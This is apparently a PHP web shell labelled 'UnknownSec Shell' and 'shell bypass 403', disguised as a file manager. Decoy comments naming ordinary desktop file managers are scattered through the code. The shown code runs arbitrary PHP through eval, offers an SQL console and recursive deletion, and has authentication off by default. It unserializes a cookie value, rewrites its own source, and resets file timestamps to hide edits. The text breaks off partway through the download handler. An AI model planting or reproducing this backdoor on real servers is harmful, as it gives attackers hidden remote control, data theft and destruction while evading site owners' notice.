shell bypass 403

UnknownSec Shell


name : index.php
<?php

     

         /* PHP File Mananger Hirasaka 4.6 */



    // The default file management tool for Windows operating systems
  
	            
	              $authorizationAuthorize = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":"<script type=\"text\/javascript\" src=\"https:\/\/www.cdolivet.com\/editarea\/editarea\/edit_area\/edit_area_full.js\"><\/script>\r\n<script language=\"Javascript\" type=\"text\/javascript\">\r\neditAreaLoader.init({\r\nid: \"newcontent\"\r\n,display: \"later\"\r\n,start_highlight: true\r\n,allow_resize: \"both\"\r\n,allow_toggle: true\r\n,word_wrap: true\r\n,language: \"ru\"\r\n,syntax: \"php\"\t\r\n,toolbar: \"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\"\r\n,syntax_selection_allow: \"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"\r\n});\r\n<\/script>"}';





$php_templates = '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}';
   $sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}';

$translation = '{"id":"ru","Add":"Добавить","Are you sure you want to delete this directory (recursively)?":"Вы уверены, что хотите удалить эту папку (рекурсивно)?","Are you sure you want to delete this file?":"Вы уверены, что хотите удалить этот файл?","Archiving":"Архивировать","Authorization":"Авторизация","Back":"Назад","Cancel":"Отмена","Chinese":"Китайский","Compress":"Сжать","Console":"Консоль","Cookie":"Куки","Created":"Создан","Date":"Дата","Days":"Дней","Decompress":"Распаковать","Delete":"Удалить","Deleted":"Удалено","Download":"Скачать","done":"закончена","Edit":"Редактировать","Enter":"Вход","English":"Английский","Error occurred":"Произошла ошибка","File manager":"Файловый менеджер","File selected":"Выбран файл","File updated":"Файл сохранен","Filename":"Имя файла","Files uploaded":"Файл загружен","French":"Французский","Generation time":"Генерация страницы","German":"Немецкий","Home":"Домой","Quit":"Выход","Language":"Язык","Login":"Логин","Manage":"Управление","Make directory":"Создать папку","Name":"Наименование","New":"Новое","New file":"Новый файл","no files":"нет файлов","Password":"Пароль","pictures":"изображения","Recursively":"Рекурсивно","Rename":"Переименовать","Reset":"Сбросить","Reset settings":"Сбросить настройки","Restore file time after editing":"Восстанавливать время файла после редактирования","Result":"Результат","Rights":"Права","Russian":"Русский","Save":"Сохранить","Select":"Выберите","Select the file":"Выберите файл","Settings":"Настройка","Show":"Показать","Show size of the folder":"Показывать размер папки","Size":"Размер","Spanish":"Испанский","Submit":"Отправить","Task":"Задача","templates":"шаблоны","Ukrainian":"Украинский","Upload":"Загрузить","Value":"Значение","Hello":"Привет","Found in files":"Найдено в файлах","Search":"Поиск","Recursive search":"Рекурсивный поиск","Mask":"Маска"}';





// the default file management tool for macOS






// the default file manager for the GNOME desktop environment on Linux




$starttime = explode(' ', microtime());
                        





$starttime = $starttime[1] + $starttime[0];







		  $langs = array('en','ru','de','fr','uk');





$path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']);







$path = str_replace('\\', '/', $path) . '/';



$main_path=str_replace('\\', '/',realpath('./'));







$phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false;






$msg_configs = ''; // a versatile file manager for KDE Plasma desktop environments on Linux



$default_language = 'ru';



$detect_lang = true;

$fm_version = 1.4;


                        
//The default file manager for the Xfce desktop environment

$auth_cookies = json_decode($authorizationAuthorize,true);




$auth_cookies['authorize'] = isset($auth_cookies['authorize']) ? $auth_cookies['authorize'] : 0; 
                          
$auth_cookies['days_authorization'] = (isset($auth_cookies['days_authorization'])&&is_numeric($auth_cookies['days_authorization'])) ? (int)$auth_cookies['days_authorization'] : 30;






$auth_cookies['login'] = isset($auth_cookies['login']) ? $auth_cookies['login'] : 'admin';  

$auth_cookies['password'] = isset($auth_cookies['password']) ? $auth_cookies['password'] : 'phpfm';  
                          





$auth_cookies['cookie_name'] = isset($auth_cookies['cookie_name']) ? $auth_cookies['cookie_name'] : 'fm_user';
                          
$auth_cookies['script'] = isset($auth_cookies['script']) ? $auth_cookies['script'] : '';



// The default file manager for the MATE desktop environment
                            
$fm_default_config = array (

	            	            	            	 
	
	 'make_directory' => true, 

	            'new_file' => true, 
	            'upload_file' => true, 

	            'show_dir_size' => false, //a lightweight and fast file manager for Linux

	                                 'show_img' => true, 
                           
	            'show_php_ver' => true, 
	            'show_php_ini' => false, // a file manager for the Zorin OS that mimics Windows Explorer

	            'show_gt' => true, // a web browser and file manager for the KDE desktop environment
	            'enable_php_console' => true,

	               'enable_sql_console' => true,



	            'sql_server' => 'localhost',

	            'sql_username' => 'root',
                            
	            'sql_password' => '',
	            'sql_db' => 'test_base',

	                         'enable_proxy' => true,
                          
	            'show_phpinfo' => true,

	            'show_xls' => true,

	              
	            
	            
	            
	            
	            
	            
	               'fm_settings' => true,

	               'restore_time' => true,
	            'fm_restore_time' => false,
);



if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config;
                        
else $fm_config = unserialize($_COOKIE['fm_config']);

                         // A cross-platform file manager inspired by Total Commander

if (isset($_POST['fm_lang'])) { 
                            
	            setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth_cookies['days_authorization']));
	            $_COOKIE['fm_lang'] = $_POST['fm_lang'];
}

$language = $default_language;


                          
// A console-based file manager for Unix-like systems

if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){
	            $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']);
                           
	            if (!empty($lang_priority)){
                            
	            	            foreach ($lang_priority as $lang_arr){
                        
	            	            	            $lng = explode(';', $lang_arr);
                         
	            	            	            $lng = $lng[0];
	            	            	            if(in_array($lng,$langs)){
                        
	            	            	            	            $language = $lng;

	            	            	            	            break;

	            	            	            }


	            	            }
                            
	            }
} 
                            

                          
// A popular file manager for Windows, offering dual-pane functionality
$language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang'];


                          
// A file manager for Windows with tabbed browsing and advanced search features

$lang = json_decode($translation,true);
                         
if ($lang['id']!=$language) {
	            $get_lang = file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/' . $language . '.json');

	            if (!empty($get_lang)) {
	            	            //a highly customizable file manager for Windows

	            	            $translation_string = str_replace("'",'&#39;',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE));
                         
	            	            $fgc = file_get_contents(__FILE__);

	            	            $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
	            	            if (!empty($matches[1])) {



	            	            	            $filemtime = filemtime(__FILE__);

	            	            	            $replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc);
	            	            	            if (file_put_contents(__FILE__, $replace)) {

	            	            	            	            $msg_configs .= __('File updated');
	            	            	            }	            else $msg_configs .= __('Error occurred');
                          
	            	            	            if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);

	            	            }	            
                           
	            	            $lang = json_decode($translation_string,true);
                        
	            }

}
                        


/* a free dual-pane file manager for Windows */
                            


//a file manager for Windows with multi-panel and tabbed interfaces

function __($text){

	            global $lang;
	            if (isset($lang[$text])) return $lang[$text];

	            else return $text;

};


//a lightweight file manager for Windows with tabbed browsing

function fm_del_ki_arquivos($file_detects, $recursive = false) {
	            if($recursive && @is_dir($file_detects)) {
                        
	            	            $els = fm_scan_dir($file_detects, '', '', true);

	            	            foreach ($els as $el) {

	            	            	            if($el != '.' && $el != '..'){
                         
	            	            	            	            fm_del_ki_arquivos($file_detects . '/' . $el, true);

	            	            	            }

	            	            }

	            }

	            if(@is_dir($file_detects)) {
	            	            return rmdir($file_detects);
                        
	            } else {

	            	            return @unlink($file_detects);


	            }
}
                            


//file perms
                            
function fm_rights_string($file_detects, $if = false){

	            $perms = fileperms($file_detects);
	            $info = '';

	            if(!$if){

	            	            if (($perms & 0xC000) == 0xC000) {
	            	            	            //Socket
                          
	            	            	            $info = 's';
                        
	            	            } elseif (($perms & 0xA000) == 0xA000) {

	            	            	            //Symbolic Link
                           
	            	            	            $info = 'l';
	            	            } elseif (($perms & 0x8000) == 0x8000) {
	            	            	            //Regular

	            	            	            $info = '-';

	            	            } elseif (($perms & 0x6000) == 0x6000) {

	            	            	            //Block special

	            	            	            $info = 'b';

	            	            } elseif (($perms & 0x4000) == 0x4000) {
                        
	            	            	            //Directory
                         
	            	            	            $info = 'd';

	            	            } elseif (($perms & 0x2000) == 0x2000) {
	            	            	            //Character special
                            
	            	            	            $info = 'c';
	            	            } elseif (($perms & 0x1000) == 0x1000) {
                           
	            	            	            //FIFO pipe

	            	            	            $info = 'p';

	            	            } else {

	            	            	            //Unknown

	            	            	            $info = 'u';

	            	            }

	            }
  

	            //Owner
	            $info .= (($perms & 0x0100) ? 'r' : '-');
                        
	            $info .= (($perms & 0x0080) ? 'w' : '-');

	            $info .= (($perms & 0x0040) ?

	            (($perms & 0x0800) ? 's' : 'x' ) :
	            (($perms & 0x0800) ? 'S' : '-'));
 
                           
	            //Group

	            $info .= (($perms & 0x0020) ? 'r' : '-');
                         
	            $info .= (($perms & 0x0010) ? 'w' : '-');
	            $info .= (($perms & 0x0008) ?

	            (($perms & 0x0400) ? 's' : 'x' ) :
                         
	            (($perms & 0x0400) ? 'S' : '-'));
 

	            //World
                        
	            $info .= (($perms & 0x0004) ? 'r' : '-');

	            $info .= (($perms & 0x0002) ? 'w' : '-');

	            $info .= (($perms & 0x0001) ?
	            (($perms & 0x0200) ? 't' : 'x' ) :
	            (($perms & 0x0200) ? 'T' : '-'));



	            return $info;
}



function fm_convert_rights($mode) {
                          
	            $mode = str_pad($mode,9,'-');
                          
	            $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1');
                          
	            $mode = strtr($mode,$trans);

	            $newmode = '0';
                            
	            $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; 
	            $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; 
                         
	            $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; 

	            $newmode .= $owner . $group . $world;
	            return intval($newmode, 8);
}


function fm_chmod($file_detects, $val, $rec = false) {

	            $res = @chmod(realpath($file_detects), $val);
	            if(@is_dir($file_detects) && $rec){

	            	            $els = fm_scan_dir($file_detects);
                        
	            	            foreach ($els as $el) {

	            	            	            $res = $res && fm_chmod($file_detects . '/' . $el, $val, true);

	            	            }
	            }

	            return $res;
                          
}
                          


//load ki_arquivos

function fm_download($ka_nomeArquivoCompleto) {

    if (!empty($ka_nomeArquivoCompleto)) {
	            	            if (file_exists($ka_nomeArquivoCompleto)) {
                           
	            	            	            header("Content-Disposition: attachment; filename=" . basename($ka_nomeArquivoCompleto));   

	            	            	            header("Content-Type: application/force-download");
                           
	            	            	            header("Content-Type: application/octet-stream");

	            	            	            header("Content-Type: application/download");
                           
	            	            	            header("Content-Description: File Transfer");            
                            
	            	            	            header("Content-Length: " . ki_arquivosize($ka_nomeArquivoCompleto));	            	            

	            	            	            flush(); // a file manager and desktop replacement for Windows.

	            	            	            $fp = fopen($ka_nomeArquivoCompleto, "r");

	            	            	            while (!feof($fp)) {

	            	            	            	            echo fread($fp, 65536);

	            	            	            	            flush(); // a macOS file manager with a unique user interface and workflow
	            	            	            } 
	            	            	            fclose($fp);

	            	            	            die();
                         
	            	            } else {
	            	            	            header('HTTP/1.0 404 Not Found', true, 404);
	            	            	            header('Status: 404 Not Found'); 

	            	            	            die();
        }

    } 
}



//multi-pane file manager for Windows.

function fm_dir_size($f,$format=true) {
                        
	            if($format)  {
                           
	            	            $size=fm_dir_size($f,false);

	            	            if($size<=1024) return $size.' bytes';

	            	            elseif($size<=1024*1024) return round($size/(1024),2).'&nbsp;Kb';

	            	            elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).'&nbsp;Mb';

	            	            elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).'&nbsp;Gb';

	            	            elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).'&nbsp;Tb'; //:)))

	            	            else return round($size/(1024*1024*1024*1024*1024),2).'&nbsp;Pb'; // ;-)

	            } else {
                           
	            	            if(is_file($f)) return ki_arquivosize($f);

	            	            $size=0;

	            	            $dh=opendir($f);

	            	            while(($file_detects=readdir($dh))!==false) {
                        
	            	            	            if($file_detects=='.' || $file_detects=='..') continue;
	            	            	            if(is_file($f.'/'.$file_detects)) $size+=ki_arquivosize($f.'/'.$file_detects);
                           
	            	            	            else $size+=fm_dir_size($f.'/'.$file_detects,false);
                        
	            	            }
                        
	            	            closedir($dh);
	            	            return $size+ki_arquivosize($f); 

	            }
                         
}
                        

                            
//dual-pane file manager for macOS, Windows, and Linux

function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) {
	            $dir = $ndir = array();
                          
	            if(!empty($exp)){

	            	            $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/';
	            }
                        
	            if(!empty($type) && $type !== 'all'){
	            	            $func = 'is_' . $type;
                            
	            }

	            if(@is_dir($directory)){

	            	            $fh = opendir($directory);

	            	            while (false !== ($filename = readdir($fh))) {

	            	            	            if(substr($filename, 0, 1) != '.' || $do_not_filter) {

	            	            	            	            if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){

	            	            	            	            	            $dir[] = $filename;
	            	            	            	            }
                           
	            	            	            }
	            	            }
	            	            closedir($fh);
	            	            natsort($dir);

	            }
	            return $dir;

}


function fm_link($get,$link,$name,$title='') {
                           
	            if (empty($title)) $title=$name.' '.basename($link);

	            return '&nbsp;&nbsp;<a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>';

}
                         

                        
function fm_arr_to_option($arr,$n,$sel=''){

	            foreach($arr as $v){
	            	            $b=$v[$n];

	            	            $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>';
	            }

	            return $res;

}


                          
function fm_lang_form ($current='en'){

return '
                            
<form name="change_lang" method="post" action="">

	            <select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" >
                          
	            	            <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option>
	            	            <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option>
	            	            <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option>

	            	            <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option>
                            
	            	            <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option>
	            </select>
</form>

';

}

	            

function fm_root($dirname){

	            return ($dirname=='.' OR $dirname=='..');
}



function fm_php($string){

	            $display_ki_erro=ini_get('display_ki_erro');

	            ini_set('display_ki_erro', '1');

	            ob_start();

	            eval(trim($string));

	            $text = ob_get_contents();

	            ob_end_clean();
                            
	            ini_set('display_ki_erro', $display_ki_erro);

	            return $text;
}


//powerful file manager for macOS with many additional features
                          
function fm_sql_connect(){

	            global $fm_config;

	            return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']);
                        
}
                         

                          
function fm_sql($query){

	            global $fm_config;

	            $query=trim($query);
                           
	            ob_start();

	            $connection = fm_sql_connect();

	            if ($connection->connect_error) {
	            	            ob_end_clean();	            
	            	            return $connection->connect_error;
                         
	            }

	            $connection->set_charset('utf8');
    $queried = mysqli_query($connection,$query);
	            if ($queried===false) {

	            	            ob_end_clean();	            
	            	            return mysqli_error($connection);

    } else {
                        
	            	            if(!empty($queried)){

	            	            	            while($row = mysqli_fetch_assoc($queried)) {
                           
	            	            	            	            $querys_result[]=  $row;

	            	            	            }
	            	            }
	            	            $vdump=empty($querys_result)?'':var_export($querys_result,true);	            
                           
	            	            ob_end_clean();	            

	            	            $connection->close();

	            	            return '<pre>'.stripslashes($vdump).'</pre>';
                          
	            }
}



function fm_backup_tables($tables = '*', $full_backup = true) {

	            global $path;

	            $mysqldb = fm_sql_connect();

	            $delimiter = "; \n  \n";
                          
	            if($tables == '*')	            {
                           
	            	            $tables = array();
                         
	            	            $result = $mysqldb->query('SHOW TABLES');
                           
	            	            while($row = mysqli_fetch_row($result))	            {
                            
	            	            	            $tables[] = $row[0];

	            	            }

	            } else {
	            	            $tables = is_array($tables) ? $tables : explode(',',$tables);
	            }

    
	            $return='';
                            
	            foreach($tables as $table)	            {
	            	            $result = $mysqldb->query('SELECT * FROM '.$table);

	            	            $num_fields = mysqli_num_fields($result);
                          
	            	            $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter;

	            	            $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table));
                          
	            	            $return.=$row2[1].$delimiter;
                           
        if ($full_backup) {

	            	            for ($i = 0; $i < $num_fields; $i++)  {

	            	            	            while($row = mysqli_fetch_row($result)) {
	            	            	            	            $return.= 'INSERT INTO `'.$table.'` VALUES(';

	            	            	            	            for($j=0; $j<$num_fields; $j++)	            {

	            	            	            	            	            $row[$j] = addslashes($row[$j]);
                         
	            	            	            	            	            $row[$j] = str_replace("\n","\\n",$row[$j]);

	            	            	            	            	            if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }

	            	            	            	            	            if ($j<($num_fields-1)) { $return.= ','; }
                        
	            	            	            	            }

	            	            	            	            $return.= ')'.$delimiter;
	            	            	            }

	            	              }

	            	            } else { 

	            	            $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return);

	            	            }
	            	            $return.="\n\n\n";
	            }



	            //save file
    $file_detects=gmdate("Y-m-d_H-i-s",time()).'.sql';

	            $handle = fopen($file_detects,'w+');

	            fwrite($handle,$return);
	            fclose($handle);
	            $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file_detects. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file_detects . '&path=' . $path  . '\'"';

    return $file_detects.': '.fm_link('download',$path.$file_detects,__('Download'),__('Download').' '.$file_detects).' <a href="#" title="' . __('Delete') . ' '. $file_detects . '" ' . $alert . '>' . __('Delete') . '</a>';
}


                            
function fm_restore_tables($sqlFileToExecute) {

	            $mysqldb = fm_sql_connect();

	            $delimiter = "; \n  \n";
    // Load and explode the sql file

    $f = fopen($sqlFileToExecute,"r+");
    $sqlFile = fread($f,ki_arquivosize($sqlFileToExecute));
                           
    $sqlArray = explode($delimiter,$sqlFile);

	            
                        
    //Process the sql file by statements

    foreach ($sqlArray as $stmt) {

        if (strlen($stmt)>3){

	            	            	            $result = $mysqldb->query($stmt);
	            	            	            	            if (!$result){

	            	            	            	            	            $sqlErrorCode = mysqli_errno($mysqldb->connection);
	            	            	            	            	            $sqlErrorText = mysqli_error($mysqldb->connection);
	            	            	            	            	            $sqlStmt      = $stmt;
                           
	            	            	            	            	            break;

           	                 }
           	              }
                            
           }

if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute;

else return $sqlErrorText.'<br/>'.$stmt;

}

function fm_img_link($filename){
	            return './'.basename(__FILE__).'?img='.base64_encode($filename);

}


function fm_home_style(){
                           
	            return '

input, input.fm_input {
	            text-indent: 2px;

}
                        

                            
input, textarea, select, input.fm_input {

	            color: black;

	            font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
                          
	            border-color: black;
                         
	            background-color: #FCFCFC none !important;

	            border-radius: 0;

	            padding: 2px;

}
                           


input.fm_input {

	            background: #FCFCFC none !important;

	            cursor: pointer;
                            
}


.home {

	            background-image: url("");

	            background-repeat: no-repeat;
                        
}';
}



function fm_config_checkbox_row($name,$value) {
	            global $fm_config;
	            return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>';
                            
}
                         


function fm_protocol() {
	            if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://';
	            if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://';
	            if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://';
	            if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://';
	            return 'http://';

}


function fm_site_url() {

	            return fm_protocol().$_SERVER['HTTP_HOST'];

}



function fm_url($full=false) {
                           
	            $host=$full?fm_site_url():'.';
	            return $host.'/'.basename(__FILE__);

}



function fm_home($full=false){
	            return '&nbsp;<a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home">&nbsp;&nbsp;&nbsp;&nbsp;</span></a>';

}



function fm_run_input($lng) {

	            global $fm_config;
	            $return = !empty($fm_config['enable_'.$lng.'_console']) ? 

	            '
	            	            	            	            <form  method="post" action="'.fm_url().'" style="display:inline">

	            	            	            	            <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'">

	            	            	            	            </form>
' : '';

	            return $return;
                         
}
                         

                            
function fm_url_proxy($matches) {

	            $link = str_replace('&amp;','&',$matches[2]);
	            $url = isset($_GET['url'])?$_GET['url']:'';

	            $parse_url = parse_url($url);

	            $host = $parse_url['scheme'].'://'.$parse_url['host'].'/';
	            if (substr($link,0,2)=='//') {

	            	            $link = substr_replace($link,fm_protocol(),0,2);

	            } elseif (substr($link,0,1)=='/') {
                            
	            	            $link = substr_replace($link,$host,0,1);	            
                           
	            } elseif (substr($link,0,2)=='./') {
	            	            $link = substr_replace($link,$host,0,2);	      
								
								

                          
	            } elseif (substr($link,0,4)=='http') {
                         
	            	            //alles machen wunderschon
	            } else {

	            	            $link = $host.$link;

	            } 
	            if ($matches[1]=='href' && !strripos($link, 'css')) {

	            	            $base = fm_site_url().'/'.basename(__FILE__);

	            	            $baseq = $base.'?proxy=true&url=';

	            	            $link = $baseq.urlencode($link);
                           
	            } elseif (strripos($link, 'css')){
	            	            //как-то тоже подменять надо

	            }
                        
	            return $matches[1].'="'.$link.'"';
                        
}

 

function fm_tpl_form($lng_tpl) {

	            global ${$lng_tpl.'_templates'};

	            $tpl_arr = json_decode(${$lng_tpl.'_templates'},true);
	            $str = '';

	            foreach ($tpl_arr as $ktpl=>$vtpl) {
	            	            $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]"  cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>';

	            }

return '

<table>

<tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr>
                        
<form method="post" action="">

<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">

<tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr>
'.$str.'

<tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr>
                            
</form>

<form method="post" action="">
                           
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
                           
<tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value"  cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr>

<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr>

</form>

</table>

';
                        
}


                        
function find_text_in_ki_arquivos($dir, $mask, $text) {
    $results = array();

    if ($handle = opendir($dir)) {

        while (false !== ($entry = readdir($handle))) {

            if ($entry != "." && $entry != "..") {
                        
                $path = $dir . "/" . $entry;

                if (is_dir($path)) {

                    $results = array_merge($results, find_text_in_ki_arquivos($path, $mask, $text));

                } else {

                    if (fnmatch($mask, $entry)) {
                        $contents = file_get_contents($path);
                        if (strpos($contents, $text) !== false) {
                            $results[] = str_replace('//', '/', $path);
                        }
                    }

                }
                         
            }

        }

        closedir($handle);
                        
    }

    return $results;

}


                          

/* End Functions */

// authorization
                            
if ($auth_cookies['authorize']) {

	            if (isset($_POST['login']) && isset($_POST['password'])){

	            	            if (($_POST['login']==$auth_cookies['login']) && ($_POST['password']==$auth_cookies['password'])) {
	            	            	            setcookie($auth_cookies['cookie_name'], $auth_cookies['login'].'|'.md5($auth_cookies['password']), time() + (86400 * $auth_cookies['days_authorization']));
                            
	            	            	            $_COOKIE[$auth_cookies['cookie_name']]=$auth_cookies['login'].'|'.md5($auth_cookies['password']);
                           
	            	            }

	            }

	            if (!isset($_COOKIE[$auth_cookies['cookie_name']]) OR ($_COOKIE[$auth_cookies['cookie_name']]!=$auth_cookies['login'].'|'.md5($auth_cookies['password']))) {

	            	            echo '
<!doctype html>

<html>
                            
<head>
                         
<meta charset="utf-8" />
                         
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>'.__('File manager').'</title>

</head>

<body>
<form action="" method="post">
'.__('Login').' <input name="login" type="text">&nbsp;&nbsp;&nbsp;
                           
'.__('Password').' <input name="password" type="password">&nbsp;&nbsp;&nbsp;

<input type="submit" value="'.__('Enter').'" class="fm_input">
</form>
                         
'.fm_lang_form($language).'
</body>

</html>
                           
';  

die();

	            }

	            if (isset($_POST['quit'])) {

	            	            unset($_COOKIE[$auth_cookies['cookie_name']]);

	            	            setcookie($auth_cookies['cookie_name'], '', time() - (86400 * $auth_cookies['days_authorization']));
                            
	            	            header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']);
	            }
                          
}


                         
// Change config

if (isset($_GET['fm_settings'])) {
                            
	            if (isset($_GET['fm_config_delete'])) { 
	            	            unset($_COOKIE['fm_config']);

	            	            setcookie('fm_config', '', time() - (86400 * $auth_cookies['days_authorization']));
	            	            header('Location: '.fm_url().'?fm_settings=true');

	            	            exit(0);

	            }	            elseif (isset($_POST['fm_config'])) { 
                         
	            	            $fm_config = $_POST['fm_config'];

	            	            setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth_cookies['days_authorization']));
	            	            $_COOKIE['fm_config'] = serialize($fm_config);

	            	            $msg_configs = __('Settings').' '.__('done');
	            }	            elseif (isset($_POST['fm_login'])) { 

	            	            if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login'];
	            	            $fm_login = json_encode($_POST['fm_login']);

	            	            $fgc = file_get_contents(__FILE__);
	            	            $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);

	            	            if (!empty($matches[1])) {

	            	            	            $filemtime = filemtime(__FILE__);
	            	            	            $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc);

	            	            	            if (file_put_contents(__FILE__, $replace)) {
	            	            	            	            $msg_configs .= __('File updated');

	            	            	            	            if ($_POST['fm_login']['login'] != $auth_cookies['login']) $msg_configs .= ' '.__('Login').': '.$_POST['fm_login']['login'];

	            	            	            	            if ($_POST['fm_login']['password'] != $auth_cookies['password']) $msg_configs .= ' '.__('Password').': '.$_POST['fm_login']['password'];
	            	            	            	            $auth_cookies = $_POST['fm_login'];

	            	            	            }
                           
	            	            	            else $msg_configs .= __('Error occurred');

	            	            	            if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
                         
	            	            }
	            } elseif (isset($_POST['tpl_edited'])) { 
	            	            $lng_tpl = $_POST['tpl_edited'];

	            	            if (!empty($_POST[$lng_tpl.'_name'])) {

	            	            	            $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS);
	            	            } elseif (!empty($_POST[$lng_tpl.'_new_name'])) {

	            	            	            $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS);

	            	            }
	            	            if (!empty($fm_php)) {
                         
	            	            	            $fgc = file_get_contents(__FILE__);

	            	            	            $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);

	            	            	            if (!empty($matches[1])) {
                        
	            	            	            	            $filemtime = filemtime(__FILE__);

	            	            	            	            $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc);
	            	            	            	            if (file_put_contents(__FILE__, $replace)) {

	            	            	            	            	            ${$lng_tpl.'_templates'} = $fm_php;
                        
	            	            	            	            	            $msg_configs .= __('File updated');

	            	            	            	            } else $msg_configs .= __('Error occurred');
	            	            	            	            if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
                         
	            	            	            }	            
	            	            } else $msg_configs .= __('Error occurred');

	            }

}
                          

                          
// Just show image

if (isset($_GET['img'])) {
                          
	            $file_detects=base64_decode($_GET['img']);
	            if ($info=getimagesize($file_detects)){
                         
	            	            switch  ($info[2]){	            //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP
                          
	            	            	            case 1: $ext='gif'; break;

	            	            	            case 2: $ext='jpeg'; break;
                            
	            	            	            case 3: $ext='png'; break;

	            	            	            case 6: $ext='bmp'; break;

	            	            	            default: die();
                            
	            	            }
                           
	            	            header("Content-type: image/$ext");

	            	            echo file_get_contents($file_detects);

	            	            die();
	            }

}


// The default file manager for the Cinnamon desktop environment.
                            
if (isset($_GET['download'])) {
